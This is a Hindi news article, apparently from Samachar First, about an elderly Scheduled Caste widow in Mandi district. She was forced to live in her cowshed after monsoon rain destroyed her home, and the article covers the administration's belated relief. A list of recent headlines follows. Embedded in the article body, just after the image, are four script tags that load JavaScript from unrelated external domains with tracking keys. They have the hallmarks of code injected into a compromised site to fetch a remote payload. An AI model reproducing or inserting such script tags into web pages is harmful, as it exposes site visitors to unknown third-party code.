Categories: हिमाचल

मंडीः गौशाला में रहने को हुई मजबूर कोटली की विधवा, टूटी प्रशासन की नींद

<p>जिला मंडी की सदर तहसील कोटली के गांव कोट की वृद्ध विधवा महिला हिम्मी देवी पर उस वक़्त दुखों का पहाड़ टूट पड़ा जब आफ़त बनी बरसात ने उसके सिर से छत छीन ली। 61 साल की हिमी देवी अनुसूचित जाति से संबंध रखती है। 15 साल पहले पति ने मौत से दोस्ती कर इसका साथ छोड़ दिया। एक बेटा था उसकी मानसिक स्थिति इतनी ख़राब थी कि पिछले 7 साल से लापता है। वक़्त के थपेड़ों की मार से जूझ रही हिमी देवी पर उस वक़्त दुखों का पहाड़ टूट पड़ा जब&nbsp; 2 कमरों का पुश्तैनी कच्चा मकान था 10 अगस्त की रात बरसात की भेंट चढ़ गया। बूढ़ी जिंदगी तो बच गई लेकिन संकट सिर छुपाने की छत का था। जब हिमी देवी को कुछ नही सुझा तो अपनी गौशाला में गाए के साथ रहने को मज़बूर होना पड़ा।</p>

<p>इस समाज की यही बिडम्बना है कि ये गरीब महिला अंत्योदय तक में नहीं डाली गई है। समाचार फर्स्ट ने इस महिला से संपर्क किया तो हिमी देवी ने बताया कि एक बेटा था और 7 साल से लापता है। सामाजिक पेंशन छः-छः माह बाद मिलती है। पंचायत प्रधान ने इसे आईआरडीपी या अंत्योदय तक में नहीं डाला है। बीते कल प्रशासन की तरफ से लोग आए थे जिन्होंने 2500 रुपये की राहत दी है।</p>

<p>डीसी मंडी ऋग्वेद ठाकुर ने बताया कि इस महिला को अब दूसरी जगह रहने का कमरा दे दिया गया है। जल्द ही हिमी देवी के मकान की मुरम्मत की जाएगी। फ़िलहाल सरकार अब कच्चे घर के ढहने पर सिर्फ 40 हज़ार या इससे कम राहत राशि प्रदान करती है। इतनी राशि तो आज के मंहगाई के दौर में लेबर पर ही ख़र्च हो जाती है।</p>

<p><img src=”/media/gallery/images/image(1066).png” style=”height:600px; width:358px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1597294644420″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: दिवाली बाद 2800 शिक्षकों की भर्ती प्रक्रिया होगी शुरू

2800 JBT TGT Recruitment: हिमाचल प्रदेश में दिवाली के बाद जेबीटी, टीजीटी और सीएंडवी शिक्षकों…

21 mins ago

विश्‍व में सादगी की मिसाल थे रतन टाटा, कभी नहीं रही दुनिया के अरबपतियों की सूची में आने की इच्छा

  एजेंसी/भाषा Ratan Tata Life: रतन टाटा भारत के सबसे प्रभावशाली उद्योगपतियों में से एक…

42 mins ago

नहीं रहे रतन टाटा, 86 वर्ष की आयु में हुआ निधन, देश में शोक

  Ratan Tata death:  भारत के सबसे सम्मानित उद्योगपतियों में से एक और टाटा संस…

1 hour ago

जानें कैसा रहेगा आपका आजका दिन

मेष🐐 (चू, चे, चो, ला, ली, लू, ले, लो, अ) आज का दिन आपके लिए…

1 hour ago

किन्नौर में 300 मीटर खाई में गिरा ट्रक, दो की मौके पर मौत

Kinnaur truck accident: किन्नौर ज़िले के निगुलसरी के पास एक  सड़क दुर्घटना में एक ईंटों…

13 hours ago

मस्जिद की 3 मंजिल गिराने के फैसले को न्यायालय में चुनौती की तैयारी

Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…

13 hours ago